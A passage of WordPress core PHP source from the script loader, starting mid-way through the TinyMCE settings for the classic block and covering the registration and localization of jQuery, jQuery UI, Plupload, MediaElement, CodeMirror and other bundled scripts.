'external_plugins' => wp_json_encode( $external_plugins ),
'classic_block_editor' => true,
);
if ( $disable_captions ) {
$tinymce_settings['wpeditimage_disable_captions'] = true;
}
if ( ! empty( $editor_settings['tinymce'] ) && is_array( $editor_settings['tinymce'] ) ) {
$tinymce_settings = array_merge( $tinymce_settings, $editor_settings['tinymce'] );
}
/** This filter is documented in wp-includes/class-wp-editor.php */
$tinymce_settings = apply_filters( 'tiny_mce_before_init', $tinymce_settings, 'classic-block' );
/*
* Do "by hand" translation from PHP array to js object.
* Prevents breakage in some custom settings.
*/
$init_obj = '';
foreach ( $tinymce_settings as $key => $value ) {
if ( is_bool( $value ) ) {
$val = $value ? 'true' : 'false';
$init_obj .= $key . ':' . $val . ',';
continue;
} elseif ( ! empty( $value ) && is_string( $value ) && (
( '{' === $value[0] && '}' === $value[ strlen( $value ) - 1 ] ) ||
( '[' === $value[0] && ']' === $value[ strlen( $value ) - 1 ] ) ||
preg_match( '/^\(?function ?\(/', $value ) ) ) {
$init_obj .= $key . ':' . $value . ',';
continue;
}
$init_obj .= $key . ':"' . $value . '",';
}
$init_obj = '{' . trim( $init_obj, ' ,' ) . '}';
$script = 'window.wpEditorL10n = {
tinymce: {
baseURL: ' . wp_json_encode( includes_url( 'js/tinymce' ), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ',
suffix: ' . ( SCRIPT_DEBUG ? '""' : '".min"' ) . ',
settings: ' . $init_obj . ',
}
}';
$wp_scripts->add_inline_script( 'wp-block-library', $script, 'before' );
}
/**
* Registers all the WordPress packages scripts.
*
* @since 5.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages( $scripts ) {
wp_default_packages_vendor( $scripts );
wp_register_development_scripts( $scripts );
wp_register_tinymce_scripts( $scripts );
wp_default_packages_scripts( $scripts );
if ( did_action( 'init' ) ) {
wp_default_packages_inline_scripts( $scripts );
}
}
/**
* Returns the suffix that can be used for the scripts.
*
* There are two suffix types, the normal one and the dev suffix.
*
* @since 5.0.0
*
* @param string $type The type of suffix to retrieve.
* @return string The script suffix.
*/
function wp_scripts_get_suffix( $type = '' ) {
static $suffixes;
if ( null === $suffixes ) {
/*
* Include an unmodified $wp_version.
*
* Note: wp_get_wp_version() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* wp-includes/functions.php is not loaded.
*/
require ABSPATH . WPINC . '/version.php';
/*
* Note: str_contains() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* the polyfills from wp-includes/compat.php are not loaded.
*/
$develop_src = false !== strpos( $wp_version, '-src' );
if ( ! defined( 'SCRIPT_DEBUG' ) ) {
define( 'SCRIPT_DEBUG', $develop_src );
}
$suffix = SCRIPT_DEBUG ? '' : '.min';
$dev_suffix = $develop_src ? '' : '.min';
$suffixes = array(
'suffix' => $suffix,
'dev_suffix' => $dev_suffix,
);
}
if ( 'dev' === $type ) {
return $suffixes['dev_suffix'];
}
return $suffixes['suffix'];
}
/**
* Registers all WordPress scripts.
*
* Localizes some of them.
* args order: `$scripts->add( 'handle', 'url', 'dependencies', 'query-string', 1 );`
* when last arg === 1 queues the script for the footer
*
* @since 2.6.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_scripts( $scripts ) {
$suffix = wp_scripts_get_suffix();
$dev_suffix = wp_scripts_get_suffix( 'dev' );
$guessurl = site_url();
if ( ! $guessurl ) {
$guessed_url = true;
$guessurl = wp_guess_url();
}
$scripts->base_url = $guessurl;
$scripts->content_url = defined( 'WP_CONTENT_URL' ) ? WP_CONTENT_URL : '';
$scripts->default_version = get_bloginfo( 'version' );
$scripts->default_dirs = array( '/wp-admin/js/', '/wp-includes/js/' );
$scripts->add( 'utils', "/wp-includes/js/utils$suffix.js" );
did_action( 'init' ) && $scripts->localize(
'utils',
'userSettings',
array(
'url' => (string) SITECOOKIEPATH,
'uid' => (string) get_current_user_id(),
'time' => (string) time(),
'secure' => (string) ( 'https' === parse_url( site_url(), PHP_URL_SCHEME ) ),
)
);
$scripts->add( 'common', "/wp-admin/js/common$suffix.js", array( 'jquery', 'hoverIntent', 'utils', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'common' );
$bulk_action_observer_ids = array(
'bulk_action' => 'action',
'changeit' => 'new_role',
);
did_action( 'init' ) && $scripts->localize(
'common',
'bulkActionObserverIds',
/**
* Filters the array of field name attributes for bulk actions.
*
* @since 6.8.1
*
* @param array $bulk_action_observer_ids {
* An array of field name attributes for bulk actions.
*
* @type string $bulk_action The bulk action field name. Default 'action'.
* @type string $changeit The new role field name. Default 'new_role'.
* }
*/
apply_filters( 'bulk_action_observer_ids', $bulk_action_observer_ids )
);
$scripts->add( 'wp-sanitize', "/wp-includes/js/wp-sanitize$suffix.js", array(), false, 1 );
$scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 );
$scripts->add( 'quicktags', "/wp-includes/js/quicktags$suffix.js", array(), false, 1 );
did_action( 'init' ) && $scripts->localize(
'quicktags',
'quicktagsL10n',
array(
'closeAllOpenTags' => __( 'Close all open tags' ),
'closeTags' => __( 'close tags' ),
'enterURL' => __( 'Enter the URL' ),
'enterImageURL' => __( 'Enter the URL of the image' ),
'enterImageDescription' => __( 'Enter a description of the image' ),
'textdirection' => __( 'text direction' ),
'toggleTextdirection' => __( 'Toggle Editor Text Direction' ),
'dfw' => __( 'Distraction-free writing mode' ),
'strong' => __( 'Bold' ),
'strongClose' => __( 'Close bold tag' ),
'em' => __( 'Italic' ),
'emClose' => __( 'Close italic tag' ),
'link' => __( 'Insert link' ),
'blockquote' => __( 'Blockquote' ),
'blockquoteClose' => __( 'Close blockquote tag' ),
'del' => __( 'Deleted text (strikethrough)' ),
'delClose' => __( 'Close deleted text tag' ),
'ins' => __( 'Inserted text' ),
'insClose' => __( 'Close inserted text tag' ),
'image' => __( 'Insert image' ),
'ul' => __( 'Bulleted list' ),
'ulClose' => __( 'Close bulleted list tag' ),
'ol' => __( 'Numbered list' ),
'olClose' => __( 'Close numbered list tag' ),
'li' => __( 'List item' ),
'liClose' => __( 'Close list item tag' ),
'code' => __( 'Code' ),
'codeClose' => __( 'Close code tag' ),
'more' => __( 'Insert Read More tag' ),
)
);
$scripts->add( 'colorpicker', "/wp-includes/js/colorpicker$suffix.js", array( 'prototype' ), '3517m' );
$scripts->add( 'editor', "/wp-admin/js/editor$suffix.js", array( 'utils', 'jquery' ), false, 1 );
$scripts->add( 'clipboard', "/wp-includes/js/clipboard$suffix.js", array(), '2.0.11', 1 );
$scripts->add( 'wp-ajax-response', "/wp-includes/js/wp-ajax-response$suffix.js", array( 'jquery', 'wp-a11y' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'wp-ajax-response',
'wpAjax',
array(
'noPerm' => __( 'Sorry, you are not allowed to do that.' ),
'broken' => __( 'An error occurred while processing your request. Please try again later.' ),
)
);
$scripts->add( 'wp-api-request', "/wp-includes/js/api-request$suffix.js", array( 'jquery' ), false, 1 );
// `wpApiSettings` is also used by `wp-api`, which depends on this script.
did_action( 'init' ) && $scripts->localize(
'wp-api-request',
'wpApiSettings',
array(
'root' => sanitize_url( get_rest_url() ),
'nonce' => wp_installing() ? '' : wp_create_nonce( 'wp_rest' ),
'versionString' => 'wp/v2/',
)
);
$scripts->add( 'wp-pointer', "/wp-includes/js/wp-pointer$suffix.js", array( 'jquery-ui-core' ), false, 1 );
$scripts->set_translations( 'wp-pointer' );
$scripts->add( 'autosave', "/wp-includes/js/autosave$suffix.js", array( 'heartbeat' ), false, 1 );
$scripts->add( 'heartbeat', "/wp-includes/js/heartbeat$suffix.js", array( 'jquery', 'wp-hooks' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'heartbeat',
'heartbeatSettings',
/**
* Filters the Heartbeat settings.
*
* @since 3.6.0
*
* @param array $settings Heartbeat settings array.
*/
apply_filters( 'heartbeat_settings', array() )
);
$scripts->add( 'wp-auth-check', "/wp-includes/js/wp-auth-check$suffix.js", array( 'heartbeat' ), false, 1 );
$scripts->set_translations( 'wp-auth-check' );
$scripts->add( 'wp-lists', "/wp-includes/js/wp-lists$suffix.js", array( 'wp-ajax-response', 'jquery-color' ), false, 1 );
$scripts->add( 'site-icon', '/wp-admin/js/site-icon.js', array( 'jquery' ), false, 1 );
$scripts->set_translations( 'site-icon' );
// WordPress no longer uses or bundles Prototype or script.aculo.us. These are now pulled from an external source.
$scripts->add( 'prototype', 'https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js', array(), '1.7.1' );
$scripts->add( 'scriptaculous-root', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js', array( 'prototype' ), '1.9.0' );
$scripts->add( 'scriptaculous-builder', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/builder.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous-dragdrop', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/dragdrop.js', array( 'scriptaculous-builder', 'scriptaculous-effects' ), '1.9.0' );
$scripts->add( 'scriptaculous-effects', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous-slider', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/slider.js', array( 'scriptaculous-effects' ), '1.9.0' );
$scripts->add( 'scriptaculous-sound', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/sound.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous-controls', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/controls.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous', false, array( 'scriptaculous-dragdrop', 'scriptaculous-slider', 'scriptaculous-controls' ) );
// Not used in core, replaced by Jcrop.js.
$scripts->add( 'cropper', '/wp-includes/js/crop/cropper.js', array( 'scriptaculous-dragdrop' ) );
/*
* jQuery.
* The unminified jquery.js and jquery-migrate.js are included to facilitate debugging.
*/
$scripts->add( 'jquery', false, array( 'jquery-core', 'jquery-migrate' ), '3.7.1' );
$scripts->add( 'jquery-core', "/wp-includes/js/jquery/jquery$suffix.js", array(), '3.7.1' );
$scripts->add( 'jquery-migrate', "/wp-includes/js/jquery/jquery-migrate$suffix.js", array(), '3.4.1' );
/*
* Full jQuery UI.
* The build process in 1.12.1 has changed significantly.
* In order to keep backwards compatibility, and to keep the optimized loading,
* the source files were flattened and included with some modifications for AMD loading.
* A notable change is that 'jquery-ui-core' now contains 'jquery-ui-position' and 'jquery-ui-widget'.
*/
$scripts->add( 'jquery-ui-core', "/wp-includes/js/jquery/ui/core$suffix.js", array( 'jquery' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-core', "/wp-includes/js/jquery/ui/effect$suffix.js", array( 'jquery' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-blind', "/wp-includes/js/jquery/ui/effect-blind$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-bounce', "/wp-includes/js/jquery/ui/effect-bounce$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-clip', "/wp-includes/js/jquery/ui/effect-clip$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-drop', "/wp-includes/js/jquery/ui/effect-drop$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-explode', "/wp-includes/js/jquery/ui/effect-explode$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-fade', "/wp-includes/js/jquery/ui/effect-fade$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-fold', "/wp-includes/js/jquery/ui/effect-fold$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-highlight', "/wp-includes/js/jquery/ui/effect-highlight$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-puff', "/wp-includes/js/jquery/ui/effect-puff$suffix.js", array( 'jquery-effects-core', 'jquery-effects-scale' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-pulsate', "/wp-includes/js/jquery/ui/effect-pulsate$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-scale', "/wp-includes/js/jquery/ui/effect-scale$suffix.js", array( 'jquery-effects-core', 'jquery-effects-size' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-shake', "/wp-includes/js/jquery/ui/effect-shake$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-size', "/wp-includes/js/jquery/ui/effect-size$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-slide', "/wp-includes/js/jquery/ui/effect-slide$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-transfer', "/wp-includes/js/jquery/ui/effect-transfer$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
// Widgets
$scripts->add( 'jquery-ui-accordion', "/wp-includes/js/jquery/ui/accordion$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-autocomplete', "/wp-includes/js/jquery/ui/autocomplete$suffix.js", array( 'jquery-ui-menu', 'wp-a11y' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-button', "/wp-includes/js/jquery/ui/button$suffix.js", array( 'jquery-ui-core', 'jquery-ui-controlgroup', 'jquery-ui-checkboxradio' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-datepicker', "/wp-includes/js/jquery/ui/datepicker$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-dialog', "/wp-includes/js/jquery/ui/dialog$suffix.js", array( 'jquery-ui-resizable', 'jquery-ui-draggable', 'jquery-ui-button' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-menu', "/wp-includes/js/jquery/ui/menu$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-mouse', "/wp-includes/js/jquery/ui/mouse$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-progressbar', "/wp-includes/js/jquery/ui/progressbar$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-selectmenu', "/wp-includes/js/jquery/ui/selectmenu$suffix.js", array( 'jquery-ui-menu' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-slider', "/wp-includes/js/jquery/ui/slider$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-spinner', "/wp-includes/js/jquery/ui/spinner$suffix.js", array( 'jquery-ui-button' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-tabs', "/wp-includes/js/jquery/ui/tabs$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-tooltip', "/wp-includes/js/jquery/ui/tooltip$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
// New in 1.12.1
$scripts->add( 'jquery-ui-checkboxradio', "/wp-includes/js/jquery/ui/checkboxradio$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-controlgroup', "/wp-includes/js/jquery/ui/controlgroup$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
// Interactions
$scripts->add( 'jquery-ui-draggable', "/wp-includes/js/jquery/ui/draggable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-droppable', "/wp-includes/js/jquery/ui/droppable$suffix.js", array( 'jquery-ui-draggable' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-resizable', "/wp-includes/js/jquery/ui/resizable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-selectable', "/wp-includes/js/jquery/ui/selectable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-sortable', "/wp-includes/js/jquery/ui/sortable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
/*
* As of 1.12.1 `jquery-ui-position` and `jquery-ui-widget` are part of `jquery-ui-core`.
* Listed here for back-compat.
*/
$scripts->add( 'jquery-ui-position', false, array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-widget', false, array( 'jquery-ui-core' ), '1.13.3', 1 );
// Deprecated, not used in core, most functionality is included in jQuery 1.3.
$scripts->add( 'jquery-form', "/wp-includes/js/jquery/jquery.form$suffix.js", array( 'jquery' ), '4.3.0', 1 );
// jQuery plugins.
$scripts->add( 'jquery-color', '/wp-includes/js/jquery/jquery.color.min.js', array( 'jquery' ), '3.0.0', 1 );
$scripts->add( 'schedule', '/wp-includes/js/jquery/jquery.schedule.js', array( 'jquery' ), '20m', 1 );
$scripts->add( 'jquery-query', '/wp-includes/js/jquery/jquery.query.js', array( 'jquery' ), '2.2.3', 1 );
$scripts->add( 'jquery-serialize-object', '/wp-includes/js/jquery/jquery.serialize-object.js', array( 'jquery' ), '0.2-wp', 1 );
$scripts->add( 'jquery-hotkeys', "/wp-includes/js/jquery/jquery.hotkeys$suffix.js", array( 'jquery' ), '0.0.2m', 1 );
$scripts->add( 'jquery-table-hotkeys', "/wp-includes/js/jquery/jquery.table-hotkeys$suffix.js", array( 'jquery', 'jquery-hotkeys' ), false, 1 );
$scripts->add( 'jquery-touch-punch', '/wp-includes/js/jquery/jquery.ui.touch-punch.js', array( 'jquery-ui-core', 'jquery-ui-mouse' ), '0.2.2', 1 );
// Not used any more, registered for backward compatibility.
$scripts->add( 'suggest', "/wp-includes/js/jquery/suggest$suffix.js", array( 'jquery' ), '1.1-20110113', 1 );
/*
* Masonry v2 depended on jQuery. v3 does not. The older jquery-masonry handle is a shiv.
* It sets jQuery as a dependency, as the theme may have been implicitly loading it this way.
*/
$scripts->add( 'imagesloaded', '/wp-includes/js/imagesloaded.min.js', array(), '5.0.0', 1 );
$scripts->add( 'masonry', '/wp-includes/js/masonry.min.js', array( 'imagesloaded' ), '4.2.2', 1 );
$scripts->add( 'jquery-masonry', '/wp-includes/js/jquery/jquery.masonry.min.js', array( 'jquery', 'masonry' ), '3.1.2b', 1 );
$scripts->add( 'thickbox', '/wp-includes/js/thickbox/thickbox.js', array( 'jquery' ), '3.1-20121105', 1 );
did_action( 'init' ) && $scripts->localize(
'thickbox',
'thickboxL10n',
array(
'next' => __( 'Next >' ),
'prev' => __( '< Prev' ),
'image' => __( 'Image' ),
'of' => __( 'of' ),
'close' => __( 'Close' ),
'noiframes' => __( 'This feature requires inline frames. You have iframes disabled or your browser does not support them.' ),
'loadingAnimation' => includes_url( 'js/thickbox/loadingAnimation.gif' ),
)
);
// Not used in core, replaced by imgAreaSelect.
$scripts->add( 'jcrop', '/wp-includes/js/jcrop/jquery.Jcrop.min.js', array( 'jquery' ), '0.9.15' );
// Error messages for Plupload.
$uploader_l10n = array(
'queue_limit_exceeded' => __( 'You have attempted to queue too many files.' ),
/* translators: %s: File name. */
'file_exceeds_size_limit' => __( '%s exceeds the maximum upload size for this site.' ),
'zero_byte_file' => __( 'This file is empty. Please try another.' ),
'invalid_filetype' => __( 'This file cannot be processed by the web server.' ),
'not_an_image' => __( 'This file is not an image. Please try another.' ),
'image_memory_exceeded' => __( 'Memory exceeded. Please try another smaller file.' ),
'image_dimensions_exceeded' => __( 'This is larger than the maximum size. Please try another.' ),
'default_error' => __( 'An error occurred in the upload. Please try again later.' ),
'missing_upload_url' => __( 'There was a configuration error. Please contact the server administrator.' ),
'upload_limit_exceeded' => __( 'You may only upload 1 file.' ),
'http_error' => __( 'Unexpected response from the server. The file may have been uploaded successfully. Check in the Media Library or reload the page.' ),
'http_error_image' => __( 'The server cannot process the image. This can happen if the server is busy or does not have enough resources to complete the task. Uploading a smaller image may help. Suggested maximum size is 2560 pixels.' ),
'upload_failed' => __( 'Upload failed.' ),
/* translators: 1: Opening link tag, 2: Closing link tag. */
'big_upload_failed' => __( 'Please try uploading this file with the %1$sbrowser uploader%2$s.' ),
/* translators: %s: File name. */
'big_upload_queued' => __( '%s exceeds the maximum upload size for the multi-file uploader when used in your browser.' ),
'io_error' => __( 'IO error.' ),
'security_error' => __( 'Security error.' ),
'file_cancelled' => __( 'File canceled.' ),
'upload_stopped' => __( 'Upload stopped.' ),
'dismiss' => __( 'Dismiss' ),
'crunching' => __( 'Crunching…' ),
'deleted' => __( 'moved to the Trash.' ),
/* translators: %s: File name. */
'error_uploading' => __( '“%s” has failed to upload.' ),
'unsupported_image' => __( 'This image cannot be displayed in a web browser. For best results convert it to JPEG before uploading.' ),
'noneditable_image' => __( 'The web server cannot generate responsive image sizes for this image. Convert it to JPEG or PNG before uploading.' ),
'file_url_copied' => __( 'The file URL has been copied to your clipboard' ),
);
$scripts->add( 'moxiejs', "/wp-includes/js/plupload/moxie$suffix.js", array(), '1.3.5.1' );
$scripts->add( 'plupload', "/wp-includes/js/plupload/plupload$suffix.js", array( 'moxiejs' ), '2.1.9' );
// Back compat handles:
foreach ( array( 'all', 'html5', 'flash', 'silverlight', 'html4' ) as $handle ) {
$scripts->add( "plupload-$handle", false, array( 'plupload' ), '2.1.1' );
}
$scripts->add( 'plupload-handlers', "/wp-includes/js/plupload/handlers$suffix.js", array( 'clipboard', 'jquery', 'plupload', 'underscore', 'wp-a11y', 'wp-i18n' ) );
did_action( 'init' ) && $scripts->localize( 'plupload-handlers', 'pluploadL10n', $uploader_l10n );
$scripts->add( 'wp-plupload', "/wp-includes/js/plupload/wp-plupload$suffix.js", array( 'plupload', 'jquery', 'media-models' ), false, 1 );
did_action( 'init' ) && $scripts->localize( 'wp-plupload', 'pluploadL10n', $uploader_l10n );
$scripts->add( 'comment-reply', "/wp-includes/js/comment-reply$suffix.js", array(), false, 1 );
if ( did_action( 'init' ) ) {
$scripts->add_data( 'comment-reply', 'strategy', 'async' );
$scripts->add_data( 'comment-reply', 'fetchpriority', 'low' ); // In Chrome this is automatically low due to the async strategy, but in Firefox and Safari the priority is normal/medium.
}
// Not used in core, obsolete. Registered for backward compatibility.
$scripts->add( 'json2', "/wp-includes/js/json2$suffix.js", array(), '2015-05-03' );
did_action( 'init' ) && $scripts->add_data( 'json2', 'conditional', '_required-conditional-dependency_' );
$scripts->add( 'underscore', "/wp-includes/js/underscore$dev_suffix.js", array(), '1.13.7', 1 );
$scripts->add( 'backbone', "/wp-includes/js/backbone$dev_suffix.js", array( 'underscore', 'jquery' ), '1.6.0', 1 );
$scripts->add( 'wp-util', "/wp-includes/js/wp-util$suffix.js", array( 'underscore', 'jquery' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'wp-util',
'_wpUtilSettings',
array(
'ajax' => array(
'url' => admin_url( 'admin-ajax.php', 'relative' ),
),
)
);
$scripts->add( 'wp-backbone', "/wp-includes/js/wp-backbone$suffix.js", array( 'backbone', 'wp-util' ), false, 1 );
$scripts->add( 'revisions', "/wp-admin/js/revisions$suffix.js", array( 'wp-backbone', 'jquery-ui-slider', 'hoverIntent' ), false, 1 );
$scripts->add( 'imgareaselect', "/wp-includes/js/imgareaselect/jquery.imgareaselect$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'mediaelement', false, array( 'jquery', 'mediaelement-core', 'mediaelement-migrate' ), '4.2.17', 1 );
$scripts->add( 'mediaelement-core', "/wp-includes/js/mediaelement/mediaelement-and-player$suffix.js", array(), '4.2.17', 1 );
$scripts->add( 'mediaelement-migrate', "/wp-includes/js/mediaelement/mediaelement-migrate$suffix.js", array(), false, 1 );
did_action( 'init' ) && $scripts->add_inline_script(
'mediaelement-core',
sprintf(
'var mejsL10n = %s;',
wp_json_encode(
array(
'language' => strtolower( strtok( determine_locale(), '_-' ) ),
'strings' => array(
'mejs.download-file' => __( 'Download File' ),
'mejs.install-flash' => __( 'You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https://get.adobe.com/flashplayer/' ),
'mejs.fullscreen' => __( 'Fullscreen' ),
'mejs.play' => __( 'Play' ),
'mejs.pause' => __( 'Pause' ),
'mejs.time-slider' => __( 'Time Slider' ),
'mejs.time-help-text' => __( 'Use Left/Right Arrow keys to advance one second, Up/Down arrows to advance ten seconds.' ),
'mejs.live-broadcast' => __( 'Live Broadcast' ),
'mejs.volume-help-text' => __( 'Use Up/Down Arrow keys to increase or decrease volume.' ),
'mejs.unmute' => __( 'Unmute' ),
'mejs.mute' => __( 'Mute' ),
'mejs.volume-slider' => __( 'Volume Slider' ),
'mejs.video-player' => __( 'Video Player' ),
'mejs.audio-player' => __( 'Audio Player' ),
'mejs.captions-subtitles' => __( 'Captions/Subtitles' ),
'mejs.captions-chapters' => __( 'Chapters' ),
'mejs.none' => __( 'None' ),
'mejs.afrikaans' => __( 'Afrikaans' ),
'mejs.albanian' => __( 'Albanian' ),
'mejs.arabic' => __( 'Arabic' ),
'mejs.belarusian' => __( 'Belarusian' ),
'mejs.bulgarian' => __( 'Bulgarian' ),
'mejs.catalan' => __( 'Catalan' ),
'mejs.chinese' => __( 'Chinese' ),
'mejs.chinese-simplified' => __( 'Chinese (Simplified)' ),
'mejs.chinese-traditional' => __( 'Chinese (Traditional)' ),
'mejs.croatian' => __( 'Croatian' ),
'mejs.czech' => __( 'Czech' ),
'mejs.danish' => __( 'Danish' ),
'mejs.dutch' => __( 'Dutch' ),
'mejs.english' => __( 'English' ),
'mejs.estonian' => __( 'Estonian' ),
'mejs.filipino' => __( 'Filipino' ),
'mejs.finnish' => __( 'Finnish' ),
'mejs.french' => __( 'French' ),
'mejs.galician' => __( 'Galician' ),
'mejs.german' => __( 'German' ),
'mejs.greek' => __( 'Greek' ),
'mejs.haitian-creole' => __( 'Haitian Creole' ),
'mejs.hebrew' => __( 'Hebrew' ),
'mejs.hindi' => __( 'Hindi' ),
'mejs.hungarian' => __( 'Hungarian' ),
'mejs.icelandic' => __( 'Icelandic' ),
'mejs.indonesian' => __( 'Indonesian' ),
'mejs.irish' => __( 'Irish' ),
'mejs.italian' => __( 'Italian' ),
'mejs.japanese' => __( 'Japanese' ),
'mejs.korean' => __( 'Korean' ),
'mejs.latvian' => __( 'Latvian' ),
'mejs.lithuanian' => __( 'Lithuanian' ),
'mejs.macedonian' => __( 'Macedonian' ),
'mejs.malay' => __( 'Malay' ),
'mejs.maltese' => __( 'Maltese' ),
'mejs.norwegian' => __( 'Norwegian' ),
'mejs.persian' => __( 'Persian' ),
'mejs.polish' => __( 'Polish' ),
'mejs.portuguese' => __( 'Portuguese' ),
'mejs.romanian' => __( 'Romanian' ),
'mejs.russian' => __( 'Russian' ),
'mejs.serbian' => __( 'Serbian' ),
'mejs.slovak' => __( 'Slovak' ),
'mejs.slovenian' => __( 'Slovenian' ),
'mejs.spanish' => __( 'Spanish' ),
'mejs.swahili' => __( 'Swahili' ),
'mejs.swedish' => __( 'Swedish' ),
'mejs.tagalog' => __( 'Tagalog' ),
'mejs.thai' => __( 'Thai' ),
'mejs.turkish' => __( 'Turkish' ),
'mejs.ukrainian' => __( 'Ukrainian' ),
'mejs.vietnamese' => __( 'Vietnamese' ),
'mejs.welsh' => __( 'Welsh' ),
'mejs.yiddish' => __( 'Yiddish' ),
),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
)
),
'before'
);
$scripts->add( 'mediaelement-vimeo', '/wp-includes/js/mediaelement/renderers/vimeo.min.js', array( 'mediaelement' ), '4.2.17', 1 );
$scripts->add( 'wp-mediaelement', "/wp-includes/js/mediaelement/wp-mediaelement$suffix.js", array( 'mediaelement' ), false, 1 );
$mejs_settings = array(
'pluginPath' => includes_url( 'js/mediaelement/', 'relative' ),
'classPrefix' => 'mejs-',
'stretching' => 'responsive',
/** This filter is documented in wp-includes/media.php */
'audioShortcodeLibrary' => apply_filters( 'wp_audio_shortcode_library', 'mediaelement' ),
/** This filter is documented in wp-includes/media.php */
'videoShortcodeLibrary' => apply_filters( 'wp_video_shortcode_library', 'mediaelement' ),
);
did_action( 'init' ) && $scripts->localize(
'mediaelement',
'_wpmejsSettings',
/**
* Filters the MediaElement configuration settings.
*
* @since 4.4.0
*
* @param array $mejs_settings MediaElement settings array.
*/
apply_filters( 'mejs_settings', $mejs_settings )
);
$scripts->add( 'wp-codemirror', '/wp-includes/js/codemirror/codemirror.min.js', array(), '5.29.1-alpha-ee20357' );
$scripts->add( 'csslint', '/wp-includes/js/codemirror/csslint.js', array(), '1.0.5' );
$scripts->add( 'esprima', '/wp-includes/js/codemirror/esprima.js', array(), '4.0.0' );
$scripts->add( 'jshint', '/wp-includes/js/codemirror/fakejshint.js', array( 'esprima' ), '2.9.5' );
$scripts->add( 'jsonlint', '/wp-includes/js/codemirror/jsonlint.js', array(), '1.6.2' );
$scripts->add( 'htmlhint', '/wp-includes/js/codemirror/htmlhint.js', array(), '0.9.14-xwp' );
$scripts->add( 'htmlhint-kses', '/wp-includes/js/codemirror/htmlhint-kses.js', array( 'htmlhint' ) );
$scripts->add( 'code-editor', "/wp-admin/js/code-editor$suffix.js", array( 'jquery', 'wp-codemirror', 'underscore' ) );
$scripts->add( 'wp-theme-plugin-editor', "/wp-admin/js/theme-plugin-editor$suffix.js", array( 'common', 'wp-util', 'wp-sanitize', 'jquery', 'jquery-ui-core', 'wp-a11y', 'underscore' ), false, 1 );
